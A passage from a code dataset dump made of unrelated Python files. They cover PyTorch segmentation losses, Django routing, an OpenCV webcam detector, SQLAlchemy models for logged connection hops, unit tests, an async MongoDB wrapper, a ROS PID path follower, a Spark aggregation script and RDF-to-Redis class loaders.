            weight_mask = 1 + weight_mask * self.pw / pow(self.erode, 3)
            diff = target - input
            loss = torch.abs(diff) * weight_mask
            return loss.mean()
        # is_weight == 0: plain mean absolute error.
        diff = target - input
        return torch.abs(diff).mean()
class FocalLoss(nn.Module):
    """Binary focal loss on logits, reduced by mean.

    The modulating factor (1 - p_t) ** gamma down-weights easy examples.
    """

    def __init__(self, gamma=2):
        super().__init__()
        self.gamma = gamma

    def forward(self, input, target):
        if not (target.size() == input.size()):
            raise ValueError("Target size ({}) must be the same as input size ({})".format(target.size(), input.size()))
        # Numerically stable binary cross entropy with logits, written out.
        stable_offset = (-input).clamp(min=0)
        bce = input - input * target + stable_offset \
            + ((-stable_offset).exp() + (-input - stable_offset).exp()).log()
        # log(1 - p) for positives / log(p) for negatives, via logsigmoid.
        log_inv_prob = F.logsigmoid(-input * (target * 2 - 1))
        focal = (log_inv_prob * self.gamma).exp() * bce
        return focal.mean()
class TverskyLoss(nn.Module):
    """Tversky index between a target mask and sigmoid-activated logits.

    NOTE(review): forward() returns the Tversky *index* (1.0 = perfect
    overlap), not ``1 - index`` — callers minimising it should verify this
    is intended. ``torch_device`` is accepted for API compatibility but
    unused.
    """

    def __init__(self, alpha, torch_device):
        super().__init__()
        self.alpha = alpha        # weight on false positives (G\P term)
        self.beta = 1 - alpha     # weight on false negatives (P\G term)
        self.smooth = 1.0         # additive smoothing to avoid 0/0

    def forward(self, target_, output_):
        # FIX: F.sigmoid is deprecated (removed in recent torch);
        # torch.sigmoid is the identical supported call.
        output_ = torch.sigmoid(output_)
        target_f = target_.contiguous().view(-1)
        output_f = output_.contiguous().view(-1)
        """
        P : set of predicted, G : ground truth label

        Tversky Index S is
        S(P, G; a, b) = PG / (PG + aP\G + bG\P)

        Tversky Loss T is
        PG = sum of P * G
        G\P = sum of G not P
        P\G = sum of P not G
        T(a, b) = PG / (PG + aG\P + bP\G)
        """
        PG = (target_f * output_f).sum()
        G_P = ((1 - target_f) * output_f).sum()
        P_G = ((1 - output_f) * target_f).sum()

        loss = (PG + self.smooth) / (PG + (self.alpha * G_P) + (self.beta * P_G) + self.smooth)
        return loss
if __name__ == "__main__":
    # Smoke test: Tversky index between a plus-shaped target and a
    # corner-heavy prediction, on CPU.
    target = torch.tensor([[0,1,0],[1,1,1],[0,1,0]], dtype=torch.float)
    output = torch.tensor([[1,1,0],[0,0,0],[1,0,0]], dtype=torch.float)
    loss = TverskyLoss(0.3, torch.device("cpu"))
    print("Loss : ", loss(target, output))
|
991,458 | 9b26d506029353748090fd9ba1ddaa26105a4035 | from django.conf.urls import url, include
from django.contrib import admin
from django.conf.urls.static import static
from django.conf import settings
# Root URL configuration: admin plus the project's apps.
urlpatterns = [
    url(r'^admin/', admin.site.urls),

    # Project apps
    url(r'^first-draft/', include('apps.first_draft.urls', namespace='first-draft')),
]

# Development-only additions: serve media/static files directly and
# mount django-debug-toolbar.
if settings.DEBUG:
    import debug_toolbar
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
    urlpatterns += [
        url(r'^__debug__/', include(debug_toolbar.urls))
    ]
|
991,459 | 5c32c15b9d72150894a40499573c9098bb6f2c8d | import cv2
import numpy as np
import matplotlib.pyplot as plt
# Webcam object-detection demo: run a Haar cascade (trained on hand-drawn
# circles) on each frame and draw a rectangle around every hit.
# FIX: removed the unused color-range arrays and the per-frame HSV
# conversion — neither result was ever read, so they were pure dead work.
cap = cv2.VideoCapture(0)
cascade = cv2.CascadeClassifier('TrainingAssistant/results/cascades/tegaki_maru2/cascade.xml')  # load the trained classifier

while(1):
    # Grab one frame from the camera.
    ret, frame = cap.read()

    # Detect objects in the frame.
    circles = cascade.detectMultiScale(frame, 1.1, 3)
    for (x, y, w, h) in circles:
        upper_left = (x, y)
        bottom_right = (x+w, y+h)
        cv2.rectangle(frame, upper_left, bottom_right, (255, 20, 147), thickness=3)  # draw the bounding box

    cv2.imshow("display", frame)

    # Quit when 'q' is pressed.
    k = cv2.waitKey(1)
    if k == ord('q'):
        break

cap.release()
cv2.destroyAllWindows()
|
991,460 | 2cf922d1ef305316909ba84801aff210ae8a2151 | import json
from sqlalchemy import Column, Integer, String, ForeignKey
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm.session import sessionmaker
from Pub.RabbitMQ import RabbitMQInfo
import sqlalchemy
from os import path
'''
sql config
'''
# Read the datastore settings (sqlFilePath, ...) that sit next to this module.
with open(path.split(path.abspath(__file__))[0]+"/sqlConfig.json") as f:
    t = f.read()
    sqlConfig = json.loads(t)
'''
sqlalchemy engine
'''
# Shared engine + declarative base for all models below.
engine = create_engine(sqlConfig["sqlFilePath"], echo = False)
Base = declarative_base()
class ConnectionLink(Base):
    """One captured request: the client→server chain of up to seven links.

    Raw row layout:
    (id,datetime,url,client,link1,link2,link3,linkmid,link4,link5,link6,server)
    """
    __tablename__ = "connectionlinks"

    request_id = Column(Integer, primary_key = True, nullable = False)
    url_id = Column(Integer, ForeignKey('urls.url_id'))
    datetime = Column(Integer)  # NOTE(review): int — presumably a unix timestamp; confirm
    client = Column(String, nullable = False)
    link1 = Column(Integer, ForeignKey('links.id'))
    link2 = Column(Integer, ForeignKey('links.id'))
    link3 = Column(Integer, ForeignKey('links.id'))
    linkmid = Column(Integer, ForeignKey('links.id'))
    link4 = Column(Integer, ForeignKey('links.id'))
    link5 = Column(Integer, ForeignKey('links.id'))
    link6 = Column(Integer, ForeignKey('links.id'))
    server = Column(String)

    def __repr__(self):
        return "<ConnectionLink(request_id='%s',datetime='%s',url_id=%s,(client):%s->%s(server))>" % (
            self.request_id, self.datetime, self.url_id, self.client, self.server)

    def toJson(self):
        # Serialize every mapped column into a JSON object.
        return json.dumps({c.name: getattr(self, c.name, None) for c in self.__table__.columns})
class Link(Base):
    """One hop record in a captured connection path.

    Raw row layout:
    id,datetime,my_ip,next_ip,next_port,prev_circ_id,next_circ_id,direction,stream_id,is_origin,url
    """
    __tablename__ = "links"

    id = Column(Integer, primary_key = True, nullable = False)
    request_id = Column(Integer, nullable = True)
    url_id = Column(Integer, ForeignKey('urls.url_id'))
    datetime = Column(Integer)  # NOTE(review): int — presumably a unix timestamp; confirm
    prev_circ_id = Column(Integer)
    next_circ_id = Column(Integer)
    my_ip = Column(String)
    next_ip = Column(String)
    next_port = Column(Integer)
    direction = Column(Integer)
    stream_id = Column(Integer)
    is_origin = Column(Integer)

    def __repr__(self):
        # FIX: the repr previously ended "...next_ip=%s>" without closing ")".
        return "<Link(request_id='%s',datetime='%s',my_ip=%s,next_ip=%s)>" % (
            self.request_id, self.datetime, self.my_ip, self.next_ip)

    def toJson(self):
        # Consistency: ConnectionLink and Url expose the same serializer.
        return json.dumps({c.name: getattr(self, c.name, None) for c in self.__table__.columns})
class Url(Base):
    """A monitored URL with its resolved server IP and friendly site name."""
    __tablename__ = "urls"
    # id,url,server_ip
    url_id = Column(Integer, primary_key = True, nullable = False)
    url = Column(String, nullable = False)
    server_ip = Column(String, nullable = True)
    site_name=Column(String,nullable = True)

    def __repr__(self):
        return "<Url(url_id='%s',url='%s',server_ip='%s',site_name='%s')>" % (self.url_id, self.url, self.server_ip,self.site_name)

    def toJson(self):
        # Serialize every mapped column into a JSON object.
        return json.dumps({c.name: getattr(self, c.name, None) for c in self.__table__.columns})
class Cell(Base):
    """Raw captured cell payload, keyed by the capturing node's IP."""
    __tablename__ = "cells"
    cell_id = Column(Integer, primary_key = True, nullable = False)
    my_ip = Column(String, nullable = False)
    cell = Column(String, nullable = True)  # raw cell contents (can be large)

    def __repr__(self):
        return "<Cell(cell_id='%s',my_ip=%s,cell not shown here>"%(self.cell_id,self.my_ip)

# Create any missing tables for the models defined above.
Base.metadata.create_all(engine)
|
991,461 | dcb6372256401f63b4a4232bbee277b35a4e28e3 | from unittest import TestCase, main
from project.card.card import Card
from project.card.card_repository import CardRepository
from project.card.magic_card import MagicCard
class TestCardRepository(TestCase):
    """Unit tests for CardRepository: add/remove/find and count bookkeeping."""

    def setUp(self):
        # Fresh repository plus one reusable card per test.
        self.card_rep = CardRepository()
        self.magic_card = MagicCard('A')

    def test_init(self):
        self.assertEqual(0, self.card_rep.count)
        self.assertListEqual([], self.card_rep.cards)

    def test_add_to_card_with_same_name_raise_error(self):
        # Duplicate card names are rejected with a descriptive message.
        self.card_rep.add(self.magic_card)
        new_card = MagicCard('A')
        with self.assertRaises(ValueError) as exc:
            self.card_rep.add(new_card)
        self.assertEqual(str(exc.exception), "Card A already exists!")

    def test_add_card_successfully(self):
        self.card_rep.add(self.magic_card)
        self.assertIn(self.magic_card, self.card_rep.cards)

    def test_after_add_a_card_count_increase(self):
        self.card_rep.add(self.magic_card)
        self.assertEqual(self.card_rep.count, 1)

    def test_after_remove_should_be_decrease_count(self):
        self.card_rep.add(self.magic_card)
        self.assertEqual(self.card_rep.count, 1)
        self.card_rep.remove('A')
        self.assertEqual(self.card_rep.count, 0)

    def test_remove_card_raise_error(self):
        # Removing with an empty name is rejected before any lookup.
        with self.assertRaises(ValueError) as exc:
            self.card_rep.remove("")
        self.assertEqual(str(exc.exception), "Card cannot be an empty string!")

    def test_remove_card_successfully(self):
        self.card_rep.add(self.magic_card)
        self.assertEqual(self.card_rep.count, 1)
        self.card_rep.remove('A')
        self.assertNotIn(self.magic_card, self.card_rep.cards)
        self.assertEqual(self.card_rep.cards, [])

    def test_find_card(self):
        self.card_rep.add(self.magic_card)
        result = self.card_rep.find('A')
        self.assertEqual(self.magic_card, result)

if __name__ == '__main__':
    main()
|
991,462 | e4c7747d8e44af31e1c4ca446a4cc797e843e1ca | from abc import ABC
from typing import Dict
import motor.motor_asyncio
from application.main.config import settings
from application.main.infrastructure.database.db_interface import DataBaseOperations
from application.main.utility.config_loader import ConfigReaderInstance
class Mongodb(DataBaseOperations, ABC):
    """Async MongoDB implementation of DataBaseOperations using motor.

    Each call builds a fresh AsyncIOMotorClient from the host/port found in
    ``<settings.DB>_config.yaml``.
    """

    def __init__(self):
        # BUG FIX: this method was misspelled ``__int__`` (the int-conversion
        # dunder), so it never ran as the constructor and ``self.db_config``
        # was never initialised.
        super(Mongodb, self).__init__()
        self.db_config = ConfigReaderInstance.yaml.read_config_from_file(
            settings.DB + '_config.yaml')

    def _connection_uri(self) -> str:
        # Shared URI construction (was duplicated verbatim in every method).
        # NOTE(review): host and port are concatenated with no ':' between
        # them, preserved from the original — confirm against the config file.
        return 'mongodb://' + \
            str(self.db_config.test.host) + str(self.db_config.test.port)

    async def fetch_single_db_record(self, unique_id: str):
        # NOTE(review): builds the client/collection but issues no query —
        # appears unfinished; returns None as before.
        client = motor.motor_asyncio.AsyncIOMotorClient(self._connection_uri())
        collection = client[self.db_config.collection]

    async def update_single_db_record(self, record: Dict):
        # NOTE(review): unfinished — no update is issued.
        client = motor.motor_asyncio.AsyncIOMotorClient(self._connection_uri())

    async def update_multiple_db_record(self, record: Dict):
        # NOTE(review): unfinished — no update is issued.
        client = motor.motor_asyncio.AsyncIOMotorClient(self._connection_uri())

    async def fetch_multiple_db_record(self, unique_id: str):
        # NOTE(review): unfinished — no query is issued.
        client = motor.motor_asyncio.AsyncIOMotorClient(self._connection_uri())

    async def insert_single_db_record(self, record: Dict):
        """Insert one document into the configured collection."""
        client = motor.motor_asyncio.AsyncIOMotorClient(self._connection_uri())
        collection = client[self.db_config.collection]
        document = record
        return await collection.insert_one(document)

    async def insert_multiple_db_record(self, record: Dict):
        # NOTE(review): unfinished — no insert is issued.
        client = motor.motor_asyncio.AsyncIOMotorClient(self._connection_uri())
|
991,463 | 17a8cd7204a5b0b802f95b0b1d0555b6847e0b13 | from math import sqrt
def prime_nums(n):
    """Return the list of all primes in [0, n).

    Raises TypeError for non-int n and ValueError for negative n.
    """
    if type(n) != int:
        raise TypeError()
    if n < 0:
        raise ValueError()
    return [candidate for candidate in range(0, n) if is_prime(candidate)]
"""
Based on.
Title: Prime Numbers
Author: James Conan
Date: N/A
Code version: Pseudocode
Availability: http://www.cs.uwc.ac.za/~jconnan/FirstYear/checkprime.txt
"""
def is_prime(num):
    """Trial division up to sqrt(num); True iff num is prime."""
    if num < 2:
        return False  # not prime
    limit = sqrt(num)
    factor = 2
    while factor <= limit:
        if num % factor == 0:
            return False  # found a divisor -> not prime
        factor += 1
    return True  # prime
"""
Asymptotic analysis
- The iteration within the prime_nums function with run n + 1 times.
- The extra iteration detects the conditions necessary for exiting the loop.
- On each iteration, the function is_prime is called with the current value of x as an arguement.
- This arguement is used to determine the number of iterations within the the is_prime function.
- The code represents a nested loop which has a complexity of O(n^2) i.e. quadratic complexity.
- It is however unlikely that this worst scenario will occur since the nested loop is capped to the square root of the input.
""" |
991,464 | c50533e019f99748c66231c6d1518c2e23360a1e | #!/usr/bin/env python
import rospy
from nav_msgs.msg import Path
from geometry_msgs.msg import Twist, TwistStamped, PoseStamped
import roslib
import rospy
import math
import tf
import numpy as np
ROBOT_FRAME = 'base'    # TF frame of the robot base
GOAL_THRES_POS = 0.2    # [m] position tolerance for reaching a waypoint
GOAL_THRES_ANG = 0.2    # [rad] yaw tolerance for reaching a waypoint
FACE_GOAL_DIST = 1.0    # [m] within this distance, track the waypoint's own yaw
def getYaw(quat):
    """Extract the yaw angle [rad] from an (x, y, z, w) quaternion."""
    _, _, yaw = tf.transformations.euler_from_quaternion(quat)
    return yaw
def getConstrainedYaw(yaw):
    """Wrap an angle into (-pi, pi] by adding/removing whole turns."""
    full_turn = 2 * math.pi
    while yaw > math.pi:
        yaw -= full_turn
    while yaw < -math.pi:
        yaw += full_turn
    return yaw
def getAngleError(target, current):
    """Shortest signed angular difference target - current, in (-pi, pi]."""
    return getConstrainedYaw(target - current)

def getQuatFromYaw(yaw):
    """Quaternion (x, y, z, w) for a pure-yaw rotation."""
    return tf.transformations.quaternion_from_euler(0, 0, yaw)
class PathFollower:
    """PI controller that turns an incoming nav_msgs/Path into TwistStamped
    velocity commands toward the next waypoint.

    BUG FIX: the TF-failure branch called ``rospy.logwarn_throttle`` without
    the mandatory period argument, which raised TypeError exactly when the
    TF lookup failed.
    """

    def __init__(self):
        self.listener = tf.TransformListener()
        self.pub_twist = rospy.Publisher('/path_planning_and_following/twist', TwistStamped, queue_size=1)
        self.pub_path = rospy.Publisher('/art_planner/followed_path', Path, queue_size=1, latch=True)
        self.sub = rospy.Subscriber('/art_planner/path', Path, self.pathCallback)

        self.current_pose = None   # [x, y, yaw] in the fixed frame
        self.goal_pose = None      # current target waypoint [x, y, yaw]
        self.fixed_frame = None    # frame_id of the last received path
        self.path = None           # remaining waypoints as [x, y, yaw]
        self.path_ros = None       # ROS Path message kept in sync with self.path

        # Gains are [P, I, D]; D is unused.
        self.gain_pid_pos = [2, 0.0, 0.0]
        self.gain_pid_ang = [5, 0.0, 0.0]
        self.i = [0, 0, 0]         # integrators: longitudinal, lateral, yaw

    def pathCallback(self, path_msg):
        """Store a new path, dropping its first pose (the start pose)."""
        self.fixed_frame = path_msg.header.frame_id
        self.path = []
        self.path_ros = path_msg
        self.goal_pose = None
        if len(path_msg.poses) > 1:
            for ros_pose in path_msg.poses:
                pos = ros_pose.pose.position
                rot = ros_pose.pose.orientation
                yaw = getYaw([rot.x, rot.y, rot.z, rot.w])
                self.path.append([pos.x, pos.y, yaw])
            self.removePathNodesBeforeIndex(1)
            rospy.loginfo('Got path: ' + str(self.path))
            self.i = [0, 0, 0]  # Reset integrators.
        else:
            rospy.logwarn('Path message is too short')

    def updateCurrentPose(self):
        """Look up the robot pose in the fixed frame via TF."""
        if self.fixed_frame is not None:
            try:
                (trans,rot) = self.listener.lookupTransform(self.fixed_frame, ROBOT_FRAME, rospy.Time(0))
            except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
                # BUG FIX: logwarn_throttle(period, msg) — period was missing.
                rospy.logwarn_throttle(1, 'TF lookup of pose failed')
                return
            self.current_pose = [trans[0], trans[1], getYaw(rot)]
        else:
            rospy.logwarn_throttle(1, 'Fixed frame not set.')

    def publishPath(self):
        """Publish the not-yet-consumed remainder of the path (latched)."""
        if self.fixed_frame is not None:
            msg = Path()
            msg.header.frame_id = self.fixed_frame
            if self.path_ros is not None:
                msg.poses = self.path_ros.poses
            self.pub_path.publish(msg)

    def removePathNodesBeforeIndex(self, index):
        """Drop already-passed waypoints from both path representations."""
        self.path = self.path[index:]
        self.path_ros.poses = self.path_ros.poses[index:]

    def updateCurrentGoalPose(self):
        """Advance the goal waypoint: pop it once reached, then pick the
        furthest waypoint the robot has already passed along the path."""
        if self.goal_pose is not None:
            dx = self.goal_pose[0] - self.current_pose[0]
            dy = self.goal_pose[1] - self.current_pose[1]
            dist = (dx**2 + dy**2)**0.5
            dyaw = getAngleError(self.goal_pose[2], self.current_pose[2])
            if dist < GOAL_THRES_POS and abs(dyaw) < GOAL_THRES_ANG:
                if len(self.path) > 1:
                    self.removePathNodesBeforeIndex(1)
                else:
                    # Final waypoint reached: clear everything.
                    self.path = None
                    self.path_ros = None
                self.publishPath()
                self.goal_pose = None

        # Only get new goal pose if we don't have one.
        if self.goal_pose is None:
            if self.current_pose is not None and self.path is not None:
                # Set goal to final path segment in case we have a weird path
                # and all checks fail.
                largest_valid_index = 0
                for i in range(len(self.path)-1):
                    path_segment = np.array([self.path[i+1][0] - self.path[i][0],
                                             self.path[i+1][1] - self.path[i][1]])
                    robot_from_node = np.array([self.current_pose[0] - self.path[i][0],
                                                self.current_pose[1] - self.path[i][1]])
                    dist_along_path = robot_from_node.dot(path_segment)
                    if (dist_along_path > 0):
                        # Robot is "in front of" the current node.
                        if i+1 > largest_valid_index:
                            largest_valid_index = i+1
                    else:
                        break
                self.removePathNodesBeforeIndex(largest_valid_index)
                self.goal_pose = self.path[0]
                self.publishPath()

    def getYawTarget(self):
        """Yaw to command: face along the travel direction while far away
        (forwards or backwards, whichever is closer), the waypoint's own
        yaw once within FACE_GOAL_DIST."""
        dx = self.goal_pose[0] - self.current_pose[0]
        dy = self.goal_pose[1] - self.current_pose[1]
        dist = (dx**2 + dy**2)**0.5
        if dist < FACE_GOAL_DIST:
            return self.goal_pose[2]
        else:
            # Face towards goal.
            yaw_target = math.atan2(dy, dx)
            error = getAngleError(yaw_target, self.current_pose[2])
            if abs(error) > math.pi*0.5:
                # Face dat booty towards the goal (drive backwards).
                yaw_target = getConstrainedYaw(yaw_target + math.pi)
            return yaw_target

    def computeAndPublishTwist(self):
        """Main control step: update pose + goal, run the PI law, publish."""
        self.updateCurrentPose()
        if self.path is not None and self.current_pose is not None:
            self.updateCurrentGoalPose()
            if self.goal_pose is None:
                return
            msg = TwistStamped()
            msg.header.frame_id = ROBOT_FRAME
            msg.header.stamp = rospy.Time.now()

            yaw = self.current_pose[2]
            yaw_target = self.getYawTarget()
            dx = self.goal_pose[0] - self.current_pose[0]
            dy = self.goal_pose[1] - self.current_pose[1]
            dyaw = getAngleError(yaw_target, self.current_pose[2])
            # Rotate the world-frame error into the robot frame.
            dlon = math.cos(yaw)*dx + math.sin(yaw)*dy
            dlat = -math.sin(yaw)*dx + math.cos(yaw)*dy

            # Update integrator.
            self.i[0] += dlon
            self.i[1] += dlat
            self.i[2] += dyaw

            lon_rate = dlon * self.gain_pid_pos[0] + self.i[0] * self.gain_pid_pos[1]
            lat_rate = dlat * self.gain_pid_pos[0] + self.i[1] * self.gain_pid_pos[1]
            yaw_rate = dyaw * self.gain_pid_ang[0] + self.i[2] * self.gain_pid_ang[1]

            msg.twist.linear.x = lon_rate
            msg.twist.linear.y = lat_rate
            msg.twist.angular.z = yaw_rate
            self.pub_twist.publish(msg)
if __name__ == '__main__':
    # Run the follower control loop at 10 Hz until the node is shut down.
    rospy.init_node('path_follower_pid')
    follower = PathFollower()
    rate = rospy.Rate(10) # 10hz
    while not rospy.is_shutdown():
        follower.computeAndPublishTwist()
        rate.sleep()
#!/usr/bin/env python
# license removed for brevity
# import rospy
# from std_msgs.msg import String
# def talker():
# pub = rospy.Publisher('chatter', String, queue_size=10)
# rospy.init_node('talker', anonymous=True)
# rate = rospy.Rate(10) # 10hz
# while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
# rospy.loginfo(hello_str)
# pub.publish(hello_str)
# rate.sleep()
# if __name__ == '__main__':
# try:
# talker()
# except rospy.ROSInterruptException:
# pass
#!/usr/bin/env python
# import rospy
# from std_msgs.msg import String
# def callback(data):
# rospy.loginfo(rospy.get_caller_id() + "I heard %s", data.data)
# def listener():
# # In ROS, nodes are uniquely named. If two nodes with the same
# # name are launched, the previous one is kicked off. The
# # anonymous=True flag means that rospy will choose a unique
# # name for our 'listener' node so that multiple listeners can
# # run simultaneously.
# rospy.init_node('listener', anonymous=True)
# rospy.Subscriber("chatter", String, callback)
# # spin() simply keeps python from exiting until this node is stopped
# rospy.spin()
# if __name__ == '__main__':
# listener() |
991,465 | 4adb4af4e30d98b5b056f18b97508978e08bb4d3 | from pyspark import SparkConf, SparkContext
# Local single-process Spark context for the friends-by-age example.
conf=SparkConf().setMaster('local').setAppName('FriendsByAge')
sc=SparkContext(conf=conf)
def parseLine(line):
    """Parse one fakefriends.csv row into an (age, numFriends) int pair."""
    fields = line.split(',')
    # Column 2 is the age, column 3 the friend count.
    return int(fields[2]), int(fields[3])
# Average friend count per age: sum and count per key, then divide.
lines=sc.textFile("file:///SparkCourse/fakefriends.csv")
rdd=lines.map(parseLine)
totalByAge=rdd.mapValues(lambda x:(x,1)).reduceByKey(lambda x,y:(x[0]+y[0],x[1]+y[1]))
averagesByAge=totalByAge.mapValues(lambda x:x[0]/x[1])
results=averagesByAge.collect()
# BUG FIX: ``a = results.sort()`` bound None (list.sort is in-place and
# returns None); sort the collected results by age before printing.
results.sort()
for result in results:
    print ('People in age of: ', result[0], ' have in average: {:.0f}'.format(result[1]), ' friends', sep='')
991,466 | 34b82743396a5c8a898bd7272d112ecfec23b9f3 | """
:mod:`common` -- Common functions and classes for supporting FRBR Redis datastore
"""
__author__ = 'Jeremy Nelson'
import urllib2,os,logging
import sys,redis
import namespaces as ns
from lxml import etree
try:
    # Prefer the project-level config module when it is importable.
    import config
    REDIS_HOST = config.REDIS_HOST
    REDIS_PORT = config.REDIS_PORT
    REDIS_DB = config.REDIS_DB
except ImportError:
    # Fall back to a default local Redis instance.
    REDIS_HOST = '127.0.0.1'
    REDIS_PORT = 6379
    REDIS_DB = 0

# Module-wide Redis connection shared by the loader functions below.
redis_server = redis.StrictRedis(host=REDIS_HOST,
                                 port=REDIS_PORT,
                                 db=REDIS_DB)
def create_key_from_url(raw_url):
    """
    Function parses url, reverses the net location to create a value for use
    as a Redis key.

    :param raw_url: Raw url to extract key, required
    :rtype: String
    """
    parsed = urllib2.urlparse.urlparse(raw_url)
    # Reverse the host components (www.example.org -> org.example.www)
    # and append the path unchanged.
    host_parts = parsed.netloc.split(".")
    host_parts.reverse()
    return ".".join(host_parts) + parsed.path
def load_rdf_skos(redis_key,rdf_url):
    """
    Loads skos:ConceptSchema coded in RDF from a URL

    :param redis_key: Base Redis key
    :param rdf_url: URL to RDF document
    """
    raw_rdf = urllib2.urlopen(rdf_url).read()
    skos_rdf = etree.XML(raw_rdf)
    # Use the scheme's dc:title when present, else derive one from the key.
    title_element = skos_rdf.find('{%s}ConceptScheme/{%s}title' %\
                                  (ns.SKOS,ns.DC))
    if title_element is None:
        title = redis_key.title()
    else:
        title = title_element.text
    redis_server.set('%s:title' % redis_key,title)
    # Add every concept's preferred label to the Redis set.
    all_concepts = skos_rdf.findall('{%s}Concept' % ns.SKOS)
    for concept in all_concepts:
        label = concept.find('{%s}prefLabel' % ns.SKOS)
        if label is not None:
            # NOTE(review): 'Published' is skipped — presumably a workflow
            # status rather than a vocabulary term; confirm.
            if label.text != 'Published':
                redis_server.sadd(redis_key,
                                  label.text)
                print("Added %s to %s" % (label.text,
                                          redis_key))
    # Force a snapshot so the loaded vocabulary survives a restart.
    redis_server.save()
def get_python_classname(raw_classname):
    """
    Helper function creates valid Python class name for
    dynamic class creation at runtime.

    :param raw_classname: String from parsed data structure
    :rtype string: Valid Python class name
    """
    # Strip the characters that are illegal in Python identifiers.
    return raw_classname.replace(" ", "").replace("-", "")
def load_dynamic_classes(rdf_url,redis_prefix,current_module):
    """
    Function takes an URL to an RDF file, parses out and creates
    classes based on the rdfs:Class element.

    :param rdf_url: URL or file location to the RDF file
    :param redis_prefix: Redis key prefix used for the generated classes
    :param current_module: Current module the classes are attached to
    """
    # Try the network first, then fall back to a local file path.
    # BUG FIX: the error report used to live in a ``finally`` clause, so it
    # printed "Error ..." (with a stale/empty sys.exc_info()) on every call,
    # including successful ones. It now fires only when the URL fetch fails.
    # (Also removed the unused ``ns_map`` local.)
    try:
        raw_rdf = urllib2.urlopen(rdf_url).read()
    except (urllib2.URLError,ValueError):
        print("Error %s loading %s" % (sys.exc_info(),
                                       rdf_url))
        raw_rdf = open(rdf_url,"r").read()
    rdf = etree.XML(raw_rdf)
    all_classes = rdf.findall('{%s}Class' % ns.RDFS)
    for rdf_class in all_classes:
        rdf_ID = rdf_class.get("{%s}ID" % ns.RDF)
        label = rdf_class.find("{%s}label[@{%s}lang='en']" %\
                               (ns.RDFS,
                                ns.XML))
        # Resolve the parent classes named by rdfs:subClassOf references.
        parent_classes = rdf_class.findall("{%s}subClassOf" %\
                                           ns.RDFS)
        super_classes = []
        for parent in parent_classes:
            parent_id = parent.get("{%s}resource" % ns.RDF)
            parent_id = parent_id.replace("#","")
            parent = rdf.find("{%s}Class[@{%s}ID='%s']" %\
                              (ns.RDFS,
                               ns.RDF,
                               parent_id))
            if parent is not None:
                parent_label = parent.find("{%s}label[@{%s}lang='en']" %\
                                           (ns.RDFS,
                                            ns.XML))
                super_classes.append(get_python_classname(parent_label.text))
        if len(super_classes) < 1:
            super_classes.append(object)
        class_name = get_python_classname(label.text)
        params = {'rdf_ID':rdf_ID,
                  'redis_key': '%s:%s' % (redis_prefix,
                                          class_name)}
        # Collect the properties whose rdfs:range points back at this class.
        all_prop_xpath = "{%s}Property/{%s}range[@{%s}resource='#%s']" %\
                         (ns.RDF,
                          ns.RDFS,
                          ns.RDF,
                          rdf_ID)
        all_ranges = rdf.findall(all_prop_xpath)
        properties = []
        for rdf_range in all_ranges:
            rdf_property = rdf_range.getparent()
            prop_name = rdf_property.find("{%s}label[@{%s}lang='en']" %\
                                          (ns.RDFS,
                                           ns.XML))
            if prop_name is not None:
                properties.append(prop_name.text)
        # Create the class at runtime and attach it to the target module.
        # NOTE(review): super_classes is computed but BaseModel is always
        # used as the sole base, matching the original behaviour — confirm
        # whether the computed hierarchy was meant to be used.
        new_class = type('%s' % class_name,
                         (BaseModel,),
                         params)
        setattr(current_module,class_name,new_class)
def load_rda_classes(rda_frbr_file,
                     rda_rel_files,
                     redis_prefix,
                     current_module):
    """
    RDA loading function, takes RDA RDF file and a RDA relationship file and
    creates python classes with properties.

    :param rda_frbr_file: FRBR entity RDA RDF file
    :param rda_rel_files: List of RDA Properties RDF files
    :param redis_prefix: Redis Prefix
    :param current_module: Current module the classes are attached to
    """
    raw_rda_frbr = open(rda_frbr_file,'rb').read()
    rda_frbr = etree.XML(raw_rda_frbr)
    # Parse every relationship file up front so each entity can scan them all.
    rda_rels_xml = []
    for filename in rda_rel_files:
        raw_rda_rel = open(filename,'rb').read()
        rda_rel = etree.XML(raw_rda_rel)
        rda_rels_xml.append(rda_rel)
    all_desc = rda_frbr.findall("{%s}Description" % ns.RDF)
    for desc in all_desc:
        rda_url = desc.get('{%s}about' % ns.RDF)
        # Collect all properties whose rdfs:domain is this entity.
        all_properties = []
        for rda_rel in rda_rels_xml:
            rda_properties = rda_rel.findall('{%s}Description/{%s}domain[@{%s}resource="%s"]' % (ns.RDF,
                                                                                                 ns.RDFS,
                                                                                                 ns.RDF,
                                                                                                 rda_url))
            all_properties.extend(rda_properties)
        reg_name = desc.find('{%s}name' % ns.REG)
        if reg_name is not None:
            class_name = reg_name.text
            params = {'redis_key': '%s:%s' % (redis_prefix,
                                              class_name)}
            # Each matched property becomes a (None-initialised) attribute.
            for prop in all_properties:
                parent = prop.getparent()
                name = parent.find('{%s}name' % ns.REG)
                params[name.text] = None
                #label = parent.find('{%s}label' % ns.RDFS)
                #params[label.text] = None
            #logging.error("Params = %s" % params)
            # Create the class at runtime and attach it to the target module.
            new_class = type('%s' % class_name,
                             (BaseModel,),
                             params)
            setattr(current_module,class_name,new_class)
class BaseModel(object):
    """
    :class:`BaseModel` is a lightweight Python wrapper base class for
    use by various modules in the FRBR Redis Datastore Project. This
    class should not be used directly but should be extended by sub-classes
    depending on its use.
    """

    def __init__(self, **kwargs):
        """
        Takes a key and optional Redis server and creates an instance
        in the Redis datastore.

        :param redis_key: Redis Key, required
        :param redis_server: Redis server, if not present will be set to the
                             default (module-level) Redis server.
        """
        # `dict.has_key` is Python-2 only; the `in` operator works on both 2 and 3
        if "redis_key" in kwargs:
            self.redis_key = kwargs.pop("redis_key")
        if "redis_server" in kwargs:
            self.redis_server = kwargs.pop("redis_server")
        else:
            # fall back to the module-level `redis_server` connection
            self.redis_server = redis_server
        # per-class counter provides a unique numeric ID for this instance
        self.redis_ID = self.redis_server.incr("global:%s" % self.redis_key)
        self.frbr_key = "%s:%s" % (self.redis_key, self.redis_ID)
        for k, v in kwargs.items():
            if isinstance(v, (list, set)):
                # multi-valued property: store the members in a Redis set and
                # keep the set's key in the instance hash
                new_key = "%s:%s" % (self.frbr_key, k)
                for item in v:
                    self.redis_server.sadd(new_key, item)
                self.redis_server.hset(self.frbr_key, k, new_key)
            else:
                self.redis_server.hset(self.frbr_key, k, v)
                # NOTE: as in the original, the attribute is only set for
